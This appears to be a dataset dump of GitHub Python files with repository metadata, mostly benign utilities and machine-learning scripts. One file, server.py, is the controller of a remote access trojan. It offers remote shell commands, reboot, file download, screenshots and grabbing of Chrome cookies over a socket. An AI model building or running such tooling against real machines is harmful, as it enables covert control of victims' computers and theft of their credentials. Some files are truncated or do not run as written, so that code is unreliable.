blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
9e19db1fcad86f999dc98e1740528e846c3db383
|
75fb9959d2e0ca078e282e95edff47c6ea5fd603
|
/util/eval.py
|
bb60c133a5356d0ef3511652798c9fd3540e2c9d
|
[
"MIT"
] |
permissive
|
kmader/tangent_conv
|
7232d3ac9e2ac091e50a22b143ee559047bd8b5b
|
1cada36e9fe28e3d844fc2c974cff9565835d04e
|
refs/heads/master
| 2020-03-21T03:18:14.428221
| 2018-06-18T09:47:37
| 2018-06-18T09:47:37
| 138,046,849
| 1
| 0
| null | 2018-06-20T14:49:53
| 2018-06-20T14:49:52
| null |
UTF-8
|
Python
| false
| false
| 2,891
|
py
|
import numpy as np
import tensorflow as tf
import sys
import os
import random
from path_config import *
from cloud import *
from dataset_params import *
class param:
def __init__(self, config):
self.experiment_dir = os.path.join(get_tc_path(), config['co_experiment_dir'])
self.output_dir = os.path.join(self.experiment_dir, config['co_output_dir'])
self.test_file = os.path.join(get_tc_path(), config['co_test_file'])
self.dataset_dir = os.path.join(get_tc_path(), config['pre_dataset_dir'])
self.label_file = config["eval_label_file"]
self.output_file = config["eval_output_file"]
dataset_type = config['pre_dataset_param']
if dataset_type == "stanford":
self.d_par = stanford_params()
elif dataset_type == "scannet":
self.d_par = scannet_params()
elif dataset_type == "semantic3d":
self.d_par = semantic3d_params()
def build_conf_matrix(gt_list, pr_list):
cnt = 0
global conf_mat, classes
for gt_l in gt_list:
if gt_l > 0:
pr_l = pr_list[cnt]
conf_mat[gt_l-1, pr_l-1] += 1
cnt += 1
def get_iou():
out = []
avg = 0.0
global conf_mat, classes
for cl in classes:
nom = conf_mat[cl-1, cl-1]
denom = sum(conf_mat[cl-1, :]) + sum(conf_mat[:, cl-1]) - conf_mat[cl-1, cl-1]
if denom > 0:
out.append(nom / denom)
else:
out.append(0.0)
avg += out[cl-1]
print(out)
print("mIoU: " + str(avg / len(classes)))
return out
def get_o_acc():
s_corr = 0.0
global conf_mat, classes
for i in range(0, len(classes)):
s_corr += conf_mat[i, i]
oa = s_corr / np.sum(conf_mat)
print("oA: " + str(oa))
return oa
def get_acc():
out = []
avg = 0.0
global conf_mat, classes
for cl in classes:
nom = conf_mat[cl-1, cl-1]
denom = sum(conf_mat[cl-1, :])
if denom > 0:
out.append(nom / denom)
else:
out.append(0.0)
avg += out[cl-1]
print(out)
print("mA: " + str(avg / len(classes)))
return out
def run_eval(config):
p = param(config)
global conf_mat, classes
conf_mat = np.zeros((p.d_par.num_classes, p.d_par.num_classes))
classes = list(range(1, p.d_par.num_classes))
# exclude class 'stairs' from evaluation for S3DIS
if isinstance(p.d_par, stanford_params):
classes = classes[:-1]
with open(p.test_file) as f:
scans = f.readlines()
scans = [s.rstrip() for s in scans]
counter = 0
avg_iou = []
cnt_iou = []
avg_acc = []
cnt_acc = []
for i in range(0, len(classes)):
avg_iou.append(0.0)
cnt_iou.append(0)
avg_acc.append(0.0)
cnt_acc.append(0)
cnt = 0
for scan_name in scans:
print(scan_name)
full_scan_path = os.path.join(p.dataset_dir, scan_name)
ref_labels = read_txt_labels(os.path.join(full_scan_path, p.label_file))
pr_scan_path = os.path.join(p.output_dir, scan_name, p.output_file)
pr_labels = read_txt_labels(pr_scan_path)
counter += 1
build_conf_matrix(ref_labels, pr_labels)
cnt += 1
get_iou()
get_acc()
get_o_acc()
return 0
|
[
"m.tatarchenko@yahoo.com"
] |
m.tatarchenko@yahoo.com
|
42799e013b0f0ec0efd95d90f6b63df67014862b
|
75fa4866ab30b9f556d30ca5b3895874b0ad5084
|
/visualize.py
|
05aa06265acbbb76dc30f53dd1bdb349ed8bea1e
|
[] |
no_license
|
maozhiqiang/tacotron2-1
|
ab03850c9598bb0fba9bed44419469b94d550a83
|
3adf39a3e9b3df6e01e28c4f5f2166c6e6d59e7d
|
refs/heads/master
| 2020-04-06T07:09:14.296113
| 2018-03-02T00:59:32
| 2018-03-02T00:59:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 875
|
py
|
import matplotlib.pyplot as plt
import io
import numpy as np
from PIL import Image
def show_spectrogram(spec, text=None, return_array=False):
plt.figure(figsize=(14, 6))
plt.imshow(spec)
plt.title(text, fontsize='10')
plt.colorbar(shrink=0.5, orientation='horizontal')
plt.ylabel('mels')
plt.xlabel('frames')
if return_array:
plt.tight_layout()
buff = io.BytesIO()
plt.savefig(buff, format='png')
buff.seek(0)
return np.array(Image.open(buff))
def show_attention(attention, return_array=False):
plt.figure(figsize=(14, 6))
plt.imshow(attention)
plt.ylabel('text sequence')
plt.xlabel('spectrogram frame')
if return_array:
plt.tight_layout()
buff = io.BytesIO()
plt.savefig(buff, format='png')
buff.seek(0)
return np.array(Image.open(buff))
|
[
"jacobsonaustinj@gmail.com"
] |
jacobsonaustinj@gmail.com
|
e7d1c23b744493431d3d557a7c723432651f0fb3
|
f58a1dcae97115b566409704dcf1a46a5f86df47
|
/Bellevue University/Courses/DSC640/Week11and12/Python-master/Sorting Algorithms/merge_sort.py
|
f512f17c999cf7258922f6e19a58d34e5ac44f97
|
[
"MIT"
] |
permissive
|
safarie1103/Safarie1103
|
318519ace23c33fcf6d36337392156e5381abd49
|
a86172bfc47eff0af65285b641af0ad26e13fd12
|
refs/heads/master
| 2023-06-13T01:43:35.761325
| 2023-06-07T16:01:16
| 2023-06-07T16:01:16
| 205,732,823
| 0
| 1
| null | 2022-11-28T15:55:13
| 2019-09-01T21:11:38
| null |
UTF-8
|
Python
| false
| false
| 648
|
py
|
#---------------------------------------
# Merge Sort
#---------------------------------------
import sys
def merge_sort(A):
merge_sort2(A, 0, len(A)-1)
def merge_sort2(A, first, last):
if first < last:
middle = (first + last)//2
merge_sort2(A, first, middle)
merge_sort2(A, middle+1, last)
merge(A, first, middle, last)
def merge(A, first, middle, last):
L = A[first:middle+1]
R = A[middle+1:last+1]
L.append(sys.maxsize)
R.append(sys.maxsize)
i = j = 0
for k in range (first, last+1):
if L[i] <= R[j]:
A[k] = L[i]
i += 1
else:
A[k] = R[j]
j += 1
A = [5,9,1,2,4,8,6,3,7]
print(A)
merge_sort(A)
print(A)
|
[
"54446804+safarie1103@users.noreply.github.com"
] |
54446804+safarie1103@users.noreply.github.com
|
c378cf4373aa8e0cab042bfc688fec3fb09c4997
|
4427fc578551546d26fd8b01610d67467073e24d
|
/server.py
|
adcefe8ed33955c27acbf3a87a71be1cd7d3ff6a
|
[] |
no_license
|
dimagamera/RAT
|
d07589273e4ff56efbaff88b9787028e07523191
|
dd55616b32e7e538725b5e76e13fea9b2469da80
|
refs/heads/master
| 2023-06-08T06:41:32.424058
| 2021-06-27T17:08:48
| 2021-06-27T17:08:48
| 359,813,612
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,738
|
py
|
import socket, sys
import os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = '0.0.0.0'
port = 81
s.bind((host, port))
s.listen(1)
while True:
conn, addr = s.accept()
a = input('/cmd - Сommand line\n/mkdir - Make directory\n/reboot - Restart System\n/sysinfo - system information\n/dir - (Files, Download)\n/screen - ScreenShot\n/cks - cookies & MediaHistory(Google Chrome)\n> ')
conn.send(a.encode())
if a == '/cmd':
cmd = input('#> ')
conn.send(cmd.encode())
cmd_process = conn.recv(5000)
cmd_process = str(cmd_process, "cp866")
print(cmd_process)
elif a == '/mkdir':
dir = input('Name directory > ')
conn.send(dir.encode())
elif a == "/dir":
cmd = input('1. Файли 2. Скачати > ')
if cmd == '1':
conn.send(cmd.encode())
direct = input('1. Наявня папка 2. Перейти >')
if direct == '1':
conn.send(direct.encode())
f = open('file.txt', 'wb')
while True:
try:
data = conn.recv(1024)
if data == 'EOF'.encode():
break
f.write(data)
f.close()
except:
break
f = open('file.txt', 'r')
print(f.read())
f.close()
os.remove('file.txt')
elif direct == '2':
conn.send(direct.encode())
f = open('pwd.txt', 'wb')
while True:
try:
data = conn.recv(1024)
if data == 'EOF'.encode():
break
f.write(data)
print(data)
f.close()
os.remove('pwd.txt')
except:
break
dir = input('Directory > ')
conn.send(dir.encode())
f = open('file.txt', 'wb')
while True:
try:
data = conn.recv(1024)
if data == 'EOF'.encode():
break
f.write(data)
f.close()
except:
break
f = open('file.txt', 'r')
print(f.read())
f.close()
os.remove('file.txt')
elif a == '/sysinfo':
sysinfo = conn.recv(5000)
sysinfo = str(sysinfo, 'cp866')
print(sysinfo)
|
[
"noreply@github.com"
] |
dimagamera.noreply@github.com
|
d55fa72397ebc28f58f7760e1b3888e299a03a7e
|
2abb4dd2c1f4a0a833a24c5fb98b2b627f29c881
|
/studypython/users/admin.py
|
32fddfc8e6d1a96ae7d6712f7ff452d63127b80a
|
[
"MIT"
] |
permissive
|
studyjss/studypython
|
9192800f3b639c296b095d40a20ec7520c818fed
|
15e78cd62e90103fa23b18fd9ebc7527bfa1bd77
|
refs/heads/master
| 2021-11-19T08:58:58.528005
| 2018-08-07T06:49:00
| 2018-08-07T06:49:00
| 143,522,072
| 0
| 0
|
MIT
| 2021-09-08T00:07:54
| 2018-08-04T11:10:53
|
Python
|
UTF-8
|
Python
| false
| false
| 544
|
py
|
from django.contrib import admin
from django.contrib.auth import admin as auth_admin
from django.contrib.auth import get_user_model
from studypython.users.forms import UserChangeForm, UserCreationForm
User = get_user_model()
@admin.register(User)
class UserAdmin(auth_admin.UserAdmin):
form = UserChangeForm
add_form = UserCreationForm
fieldsets = (("User", {"fields": ("name", "followers", "following",)}),) + auth_admin.UserAdmin.fieldsets
list_display = ["username", "name", "is_superuser"]
search_fields = ["name"]
|
[
"jss@JMac.local"
] |
jss@JMac.local
|
8c777fd5c8ceb69d6a6c012f89122bbb7cb31272
|
94f5bae62a2ed5bf5bd69995d9604c191b6333a0
|
/Projects/TestApp/src/newDB.py
|
6ec6b46e27a581ec54df6a7d940a33244349f284
|
[] |
no_license
|
sethc23/BD_Scripts
|
5eef664af935fb38ad28581faaedb51075338553
|
989d62b77ca70d239ae3cf99149c5215f6e6119e
|
refs/heads/master
| 2020-04-12T17:36:17.600971
| 2017-02-22T09:46:27
| 2017-02-22T09:46:27
| 30,630,547
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 915
|
py
|
from google.appengine.ext import db
class CLposts(db.Model):
site = db.ReferenceProperty(Sites)
category = db.ReferenceProperty(Categories)
class Locations(db.Model):
location = db.StringProperty()
category = db.ReferenceProperty(Categories)
class Categories(db.Model):
postDate = db.IntegerProperty()
title = db.StringProperty()
link = db.StringProperty()
postId = db.IntegerProperty()
created = db.DateTimeProperty(auto_now_add=True)
location = "boston"
category = "wanted"
postDate = 22809
title = "Double Jogger wanted -"
link = "testing"
postId = 1054309606
wanted = Categories(name=category, postDate=postDate,
title=title, link=link,
postId=postId)
wanted.put()
boston = Locations(location=location, category=wanted.key())
boston.put()
posts = CLposts(location=boston.key(), category=wanted.key())
posts.put()
|
[
"ub2@SERVER2.local"
] |
ub2@SERVER2.local
|
2db87b6470a083d191a9ed252fc04e10a13fa0b1
|
336bca6cebe635fb79a0097fe2b3d1883ae31665
|
/testReg.py
|
1611d0b809f40dadb2bfdf7bb962c494c6c8b40c
|
[] |
no_license
|
umamuma/PythonTest
|
4694dc55593586c85c4be7c8a7f283186456c18c
|
d0fc65878111684612e09a4fc82ed42cc140db69
|
refs/heads/master
| 2020-03-26T10:08:40.294844
| 2018-09-21T01:01:15
| 2018-09-21T01:01:15
| 144,783,049
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,398
|
py
|
from __future__ import absolute_import, division, print_function
import tensorflow as tf
from tensorflow import keras
import numpy as np
print(tf.__version__)
boston_housing = keras.datasets.boston_housing
(train_data, train_labels), (test_data, test_labels) = boston_housing.load_data()
# Shuffle the training set
order = np.argsort(np.random.random(train_labels.shape))
train_data = train_data[order]
train_labels = train_labels[order]
print("Training set: {}".format(train_data.shape)) # 404 examples, 13 features
print("Testing set: {}".format(test_data.shape)) # 102 examples, 13 features
print(train_data[0]) # Display sample features, notice the different scales
import pandas as pd
column_names = ['CRIM', 'ZN', 'INDUS', 'CHAS', 'NOX', 'RM', 'AGE', 'DIS', 'RAD',
'TAX', 'PTRATIO', 'B', 'LSTAT']
df = pd.DataFrame(train_data, columns=column_names)
df.head()
print(train_labels[0:10]) # Display first 10 entries
# Test data is *not* used when calculating the mean and std
mean = train_data.mean(axis=0)
std = train_data.std(axis=0)
train_data = (train_data - mean) / std
test_data = (test_data - mean) / std
print(train_data[0]) # First training sample, normalized
def build_model():
model = keras.Sequential([
keras.layers.Dense(64, activation=tf.nn.relu,
input_shape=(train_data.shape[1],)),
keras.layers.Dense(64, activation=tf.nn.relu),
keras.layers.Dense(1)
])
optimizer = tf.train.RMSPropOptimizer(0.001)
model.compile(loss='mse',
optimizer=optimizer,
metrics=['mae'])
return model
model = build_model()
model.summary()
# Display training progress by printing a single dot for each completed epoch
class PrintDot(keras.callbacks.Callback):
def on_epoch_end(self, epoch, logs):
if epoch % 100 == 0: print('')
print('.', end='')
EPOCHS = 500
# Store training stats
history = model.fit(train_data, train_labels, epochs=EPOCHS,
validation_split=0.2, verbose=0,
callbacks=[PrintDot()])
import matplotlib.pyplot as plt
def plot_history(history):
plt.figure()
plt.xlabel('Epoch')
plt.ylabel('Mean Abs Error [1000$]')
plt.plot(history.epoch, np.array(history.history['mean_absolute_error']),
label='Train Loss')
plt.plot(history.epoch, np.array(history.history['val_mean_absolute_error']),
label = 'Val loss')
plt.legend()
plt.ylim([0, 5])
plot_history(history)
model = build_model()
# The patience parameter is the amount of epochs to check for improvement
early_stop = keras.callbacks.EarlyStopping(monitor='val_loss', patience=20)
history = model.fit(train_data, train_labels, epochs=EPOCHS,
validation_split=0.2, verbose=0,
callbacks=[early_stop, PrintDot()])
plot_history(history)
[loss, mae] = model.evaluate(test_data, test_labels, verbose=0)
print("Testing set Mean Abs Error: ${:7.2f}".format(mae * 1000))
test_predictions = model.predict(test_data).flatten()
plt.figure()
plt.scatter(test_labels, test_predictions)
plt.xlabel('True Values [1000$]')
plt.ylabel('Predictions [1000$]')
plt.axis('equal')
plt.xlim(plt.xlim())
plt.ylim(plt.ylim())
_ = plt.plot([-100, 100], [-100, 100])
error = test_predictions - test_labels
plt.figure()
plt.hist(error, bins = 50)
plt.xlabel("Prediction Error [1000$]")
_ = plt.ylabel("Count")
|
[
"TC24227@esl.corp.elbit.co.il"
] |
TC24227@esl.corp.elbit.co.il
|
1d108ec732fe66d7d450832a742f8215468e597e
|
3baca7237d5096cb3610a4668d79cae42c5d2477
|
/videos_id/video_info.py
|
fec5064c3c5f344369530534ad0586833ee99529
|
[] |
no_license
|
ittus/python-video-ids
|
fc1cad8100246ec2bed1ca88156d320ef15e6416
|
318b91a8b11f1dac7906505f94d93bc0974a9079
|
refs/heads/master
| 2021-07-25T11:51:41.121755
| 2021-06-17T09:34:19
| 2021-06-17T09:34:19
| 73,607,543
| 2
| 3
| null | 2021-07-18T05:50:12
| 2016-11-13T09:57:06
|
Python
|
UTF-8
|
Python
| false
| false
| 762
|
py
|
from videos_id.provider.dailymotion import Dailymotion
from videos_id.provider.vimeo import Vimeo
from videos_id.provider.youtube import Youtube
class VideoInfo(object):
def __init__(self):
dailymotion = Dailymotion()
youtube = Youtube()
vimeo = Vimeo()
self.platform_list = [dailymotion, youtube, vimeo]
self.platform = None
self.video_id = None
def check_video_id(self, url):
for platform in self.platform_list:
video_id = platform.check_url(url)
if video_id:
self.video_id = video_id
self.platform = platform.platform
return video_id
self.video_id = None
self.platform = None
return self.video_id
|
[
"vuminhthang.cm@gmail.com"
] |
vuminhthang.cm@gmail.com
|
ae3738da2e11597c896ff29b5496d4050f3adf7c
|
6f904270a11bd6589a393c1e3713ff37348db0e5
|
/pset7/survey/application.py
|
2fc24fbcc2a769ad1e483481bacdbbec7671e0d7
|
[] |
no_license
|
akigler/cs50_projects
|
186008d33b45360bc098f4e07c6a338ed13e9bf2
|
be5d193bdf7e52e1fcd8b82115406a2994f57f24
|
refs/heads/master
| 2020-07-08T02:48:10.226342
| 2019-08-21T08:49:21
| 2019-08-21T08:49:21
| 203,543,925
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,344
|
py
|
import cs50
import csv
from flask import Flask, jsonify, redirect, render_template, request
# Configure application
app = Flask(__name__)
# Reload templates when they are changed
app.config["TEMPLATES_AUTO_RELOAD"] = True
@app.after_request
def after_request(response):
"""Disable caching"""
response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
response.headers["Expires"] = 0
response.headers["Pragma"] = "no-cache"
return response
@app.route("/", methods=["GET"])
def get_index():
return redirect("/form")
@app.route("/form", methods=["GET"])
def get_form():
return render_template("form.html")
@app.route("/form", methods=["POST"])
def post_form():
if not request.form.get("name") or not request.form.get("house_dropdown") or not request.form.get("position"):
return render_template("error.html", message="TODO")
file = open("survey.csv", "a")
writer = csv.writer(file)
writer.writerow((request.form.get("name"), request.form.get("house_dropdown"), request.form.get("position")))
file.close()
return redirect("/sheet")
@app.route("/sheet", methods=["GET"])
def get_sheet():
with open("survey.csv", "r") as file:
reader = csv.reader(file)
students = list(reader)
return render_template("registered.html", students=students)
|
[
"jpbubar@gmail.com"
] |
jpbubar@gmail.com
|
4b33ddef5a15b9438476aff953c6a63ebf3d1a31
|
258920163b6ba24759cd21b8846f574f529274f7
|
/v3/measured_retrieval.py
|
ae49b5b5ab96cd5d980af5bb1e74f79e5f124edc
|
[] |
no_license
|
xiaochungong/attosecond_streaking_phase_retrieval
|
16186da18a463d578966acb385d1b3cf14713132
|
8a26a2393faef114ded3651b9bd4769ae648a267
|
refs/heads/master
| 2022-10-27T01:04:15.470201
| 2019-06-10T19:30:02
| 2019-06-10T19:30:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,433
|
py
|
import tensorflow as tf
import tf_functions
import numpy as np
import scipy.constants as sc
import tables
import shutil
import matplotlib.pyplot as plt
import os
import csv
from network3 import initialize_xuv_ir_trace_graphs, setup_neural_net, separate_xuv_ir_vec
import xuv_spectrum.spectrum
import ir_spectrum.ir_spectrum
def find_central_frequency_from_trace(trace, delay, energy, plotting=False):
# make sure delay is even
assert len(delay) % 2 == 0
# find central frequency
N = len(delay)
print('N: ', N)
dt = delay[-1] - delay[-2]
df = 1 / (dt * N)
freq_even = df * np.arange(-N / 2, N / 2)
# plot the streaking trace and ft
trace_f = np.fft.fftshift(np.fft.fft(np.fft.fftshift(trace, axes=1), axis=1), axes=1)
# summation along vertical axis
integrate = np.sum(np.abs(trace_f), axis=0)
# find the maximum values
f0 = find_f0(x=freq_even, y=integrate)
if plotting:
_, ax = plt.subplots(3, 1)
ax[0].pcolormesh(delay, energy, trace, cmap='jet')
ax[1].pcolormesh(freq_even, energy, np.abs(trace_f), cmap='jet')
ax[2].plot(freq_even, integrate)
return f0
def find_f0(x, y):
x = np.array(x)
y = np.array(y)
maxvals = []
for _ in range(3):
max_index = np.argmax(y)
maxvals.append(x[max_index])
x = np.delete(x, max_index)
y = np.delete(y, max_index)
maxvals = np.delete(maxvals, np.argmin(np.abs(maxvals)))
return maxvals[np.argmax(maxvals)]
def create_plot_axes():
fig = plt.figure()
fig.subplots_adjust(hspace=0.3, left=0.1, right=0.9, top=0.9, bottom=0.1)
gs = fig.add_gridspec(3, 3)
axes_dict = {}
axes_dict["input_trace"] = fig.add_subplot(gs[0,:])
axes_dict["predicted_xuv_t"] = fig.add_subplot(gs[1, 2])
axes_dict["predicted_xuv"] = fig.add_subplot(gs[1,1])
axes_dict["predicted_xuv_phase"] = axes_dict["predicted_xuv"].twinx()
axes_dict["predicted_ir"] = fig.add_subplot(gs[1,0])
axes_dict["predicted_ir_phase"] = axes_dict["predicted_ir"].twinx()
axes_dict["generated_trace"] = fig.add_subplot(gs[2,:])
return axes_dict
def plot_generated_trace(axes, generated_trace, xuv_coefs, ir_params, input_trace, tf_generator_graphs, sess, streak_params):
xuv_tmat = xuv_spectrum.spectrum.tmat * sc.physical_constants['atomic unit of time'][0]*1e18 # attosecond
xuv_fmat = xuv_spectrum.spectrum.fmat_cropped / sc.physical_constants['atomic unit of time'][0] # Hz
ir_fmat = ir_spectrum.ir_spectrum.fmat_cropped / sc.physical_constants['atomic unit of time'][0] # Hz
tau_values = (streak_params["tau_values"] * sc.physical_constants['atomic unit of time'][0])*1e15 # femtosecond
k_values = streak_params["k_values"] # a.u.
xuv_Ef = sess.run(tf_generator_graphs["xuv_E_prop"]["f_cropped"], feed_dict={tf_generator_graphs["xuv_coefs_in"]: xuv_coefs.reshape(1, -1)})
xuv_Et = sess.run(tf_generator_graphs["xuv_E_prop"]["t"], feed_dict={tf_generator_graphs["xuv_coefs_in"]: xuv_coefs.reshape(1, -1)})
ir_Ef = sess.run(tf_generator_graphs["ir_E_prop"]["f_cropped"],feed_dict={tf_generator_graphs["ir_values_in"]: ir_params.reshape(1, -1)})
axes["input_trace"].pcolormesh(tau_values,k_values,input_trace, cmap="jet")
axes["input_trace"].set_ylabel("atomic units Energy")
axes["input_trace"].set_xlabel("fs")
axes["input_trace"].set_title("input streaking trace")
axes["generated_trace"].pcolormesh(tau_values,k_values,generated_trace, cmap="jet")
axes["generated_trace"].set_xlabel("fs")
axes["generated_trace"].set_ylabel("atomic units Energy")
axes["generated_trace"].set_title("generated streaking trace")
trace_actual_reshape = generated_trace.reshape(-1)
trace_reconstructed_reshaped = input_trace.reshape(-1)
trace_rmse = np.sqrt((1 / len(trace_actual_reshape)) * np.sum(
(trace_reconstructed_reshaped - trace_actual_reshape) ** 2))
axes["generated_trace"].text(0.1, 0.1, "rmse: {}".format(trace_rmse),
transform=axes["generated_trace"].transAxes,
backgroundcolor="white")
axes["predicted_xuv_phase"].plot(xuv_fmat, np.unwrap(np.angle(xuv_Ef[0])), color='green')
axes["predicted_xuv"].plot(xuv_fmat, np.abs(xuv_Ef[0])**2, label="Intensity", color="black")
axes["predicted_xuv"].set_xlabel("Hz")
axes["predicted_xuv"].legend()
axes["predicted_xuv_t"].plot(xuv_tmat, np.real(xuv_Et[0]), color="blue", label="xuv E(t)")
axes["predicted_xuv_t"].set_xlabel("attoseconds")
axes["predicted_xuv_t"].legend()
axes["predicted_ir"].plot(ir_fmat, np.real(ir_Ef[0]), color="blue")
axes["predicted_ir"].plot(ir_fmat, np.imag(ir_Ef[0]), color="red")
axes["predicted_ir"].set_xlabel("Hz")
def get_measured_trace():
filepath = './measured_trace/sample2/MSheet1_1.csv'
with open(filepath) as csvfile:
reader = csv.reader(csvfile)
matrix = np.array(list(reader))
Energy = matrix[1:, 0].astype('float') # eV
Delay = matrix[0, 1:].astype('float') # fs
Values = matrix[1:, 1:].astype('float')
#print(Delay)
# print('len(Energy): ', len(Energy))
# print('Energy: ', Energy)
# construct frequency axis with even number for fourier transform
values_even = Values[:, :-1]
Delay_even = Delay[:-1]
Delay_even = Delay_even * 1e-15 # convert to seconds
Dtau = Delay_even[-1] - Delay_even[-2]
# print('Delay: ', Delay)
# print('Delay_even: ', Delay_even)
# print('np.shape(values_even): ', np.shape(values_even))
# print('len(values_even.reshape(-1))', len(values_even.reshape(-1)))
# print('Dtau: ', Dtau)
# print('Delay max', Delay_even[-1])
# print('N: ', len(Delay_even))
# print('Energy: ', len(Energy))
f0 = find_central_frequency_from_trace(trace=values_even, delay=Delay_even, energy=Energy)
# print(f0) # in seconds
lam0 = sc.c / f0
# print('f0 a.u.: ', f0 * sc.physical_constants['atomic unit of time'][0]) # convert f0 to atomic unit
# print('lam0: ', lam0)
# normalize values
#exit(0)
return Delay_even, Energy, values_even
if __name__ == "__main__":
tf_generator_graphs, streak_params, xuv_phase_coefs = initialize_xuv_ir_trace_graphs()
nn_nodes = setup_neural_net(streak_params, xuv_phase_coefs)
axes = create_plot_axes()
_, _, trace = get_measured_trace()
modelname = 'run3'
with tf.Session() as sess:
saver = tf.train.Saver()
saver.restore(sess, './models/{}.ckpt'.format(modelname))
predicted_fields = sess.run(nn_nodes["y_pred"], feed_dict={nn_nodes["x"]: trace.reshape(1, -1)})
xuv_coefs, ir_params = separate_xuv_ir_vec(predicted_fields[0])
generated_trace = sess.run(tf_generator_graphs["image"],
feed_dict={tf_generator_graphs["xuv_coefs_in"]: xuv_coefs.reshape(1, -1),
tf_generator_graphs["ir_values_in"]: ir_params.reshape(1, -1)})
print(np.shape(generated_trace))
plot_generated_trace(axes=axes, generated_trace=generated_trace, xuv_coefs=xuv_coefs,
ir_params=ir_params, input_trace=trace, tf_generator_graphs=tf_generator_graphs,
sess=sess, streak_params=streak_params)
plt.show()
|
[
"jonathonwhite5@gmail.com"
] |
jonathonwhite5@gmail.com
|
ebef311a1f74e61ac986ae1afbf6ba1b2e34de9d
|
eb3049039d7e5c9a9ccf2ee82a3371aa71768068
|
/messenger/chats/models.py
|
b5570151d6022b6b7403d3fcab2bb6b099b4d12e
|
[] |
no_license
|
ilpol/Django-and-PostgreSQL
|
1a98c3de068b575ee3f38e461fec6afb2a0b6c27
|
907519f5ceff18cc9a471ca1691ff65e832d29ea
|
refs/heads/main
| 2023-05-07T17:53:34.083617
| 2021-05-31T19:03:38
| 2021-05-31T19:03:38
| 372,237,690
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 285
|
py
|
import datetime
from django.db import models
from django.utils import timezone
class Chat(models.Model):
chat_name = models.CharField(max_length=200, default='')
users = models.CharField(max_length=200, default='')
messages = models.CharField(max_length=200, default='')
|
[
"IKPolozov@beeline.ru"
] |
IKPolozov@beeline.ru
|
ba5a0296deead2222078bce64a2de0a655661aef
|
0c305e2eff6582980c517d487fdfdea8ccfa2b80
|
/src/gta/gameInputs/__init__.py
|
30386d537a24667cd040c66356704e2fed5427d9
|
[] |
no_license
|
tsbertalan/gtaracer
|
5d4aeab9738adbb893eb5231aa19c3f1dda54791
|
12697fad980679f00d5dc86edd8cfa36b89f6408
|
refs/heads/master
| 2023-08-26T03:20:51.071951
| 2021-07-24T19:49:39
| 2021-07-24T19:49:39
| 108,666,881
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 602
|
py
|
# from gta.gameInputs.gamepad import JoystickEmulator
# class ControlInputs(object):
# def __init__(self):
# self.gamepadEmulator = JoystickEmulator()
# self.oldAxes = [0] * 6
# def applyControlState(self, controlVector):
# axes = controlVector[:6]
# keys = 'lx', 'ly', 'lt', 'rx', 'ry', 'rt'
# for old, new, key in zip(self.oldAxes, axes, keys):
# if old != new:
# self.gamepadEmulator.axes[key].setValue(new)
# self.gamepadEmulator.update()
# self.oldAxes = axes
# lx, ly, lt, rx, ry, rt = axes
|
[
"tom@tombertalan.com"
] |
tom@tombertalan.com
|
cdfc0f3dfbf35d333d77f8ba70d727f58fc3026d
|
338062cc2bb422f1364fd18ad5e721f6f713907a
|
/22. Функции. Возвращение значений из функций/Классная работа/Число словами.py
|
152a4277e11ca65c960203fbb12d6f156ba6f9c5
|
[] |
no_license
|
rady1337/FirstYandexLyceumCourse
|
f3421d5eac7e7fbea4f5e266ebeb6479b89941cf
|
0d27e452eda046ddd487d6471eeb7d9eb475bd39
|
refs/heads/master
| 2022-06-17T03:07:51.017888
| 2020-05-12T22:17:34
| 2020-05-12T22:17:34
| 263,459,364
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 935
|
py
|
def number_to_words(n): f = {1: 'один', 2: 'два', 3: 'три', 4: 'четыре', 5: 'пять', 6: 'шесть', 7: 'семь', 8: 'восемь', 9: 'девять'} o = {10: 'десять', 20: 'двадцать', 30: 'тридцать', 40: 'сорок', 50: 'пятьдесят', 60: 'шестьдесят', 70: 'семьдесят', 80: 'восемьдесят', 90: 'девяносто'} s = {11: 'одиннадцать', 12: 'двенадцать', 13: 'тринадцать', 14: 'четырнадцать', 15: 'пятнадцать', 16: 'шестнадцать', 17: 'семнадцать', 18: 'восемнадцать', 19: 'девятнадцать'} n1 = n % 10 n2 = n - n1 if n < 10: return f.get(n) elif 10 < n < 20: return s.get(n) elif n >= 10 and n in o: return o.get(n) else: return o.get(n2) + ' ' + f.get(n1)
|
[
"noreply@github.com"
] |
rady1337.noreply@github.com
|
dc348cc551ade3d9067dc289fb237a4bbc259df2
|
209d49d62974e95d27a59a2ee3cfc48ae8f1007a
|
/format_time.py
|
ed4ea5a0271e20a26d55441bd446f6a4f8733fb5
|
[] |
no_license
|
87302380/BA
|
bc10be7b689feec83b37a9e82e21a1ea5d6754be
|
c51c256350948dda6923510e1fd669ecf69f4e4d
|
refs/heads/master
| 2020-07-14T18:56:08.052174
| 2019-10-23T21:18:59
| 2019-10-23T21:18:59
| 205,378,488
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 428
|
py
|
import time
def print_time(start):
end = time.time()
overall_time = end - start
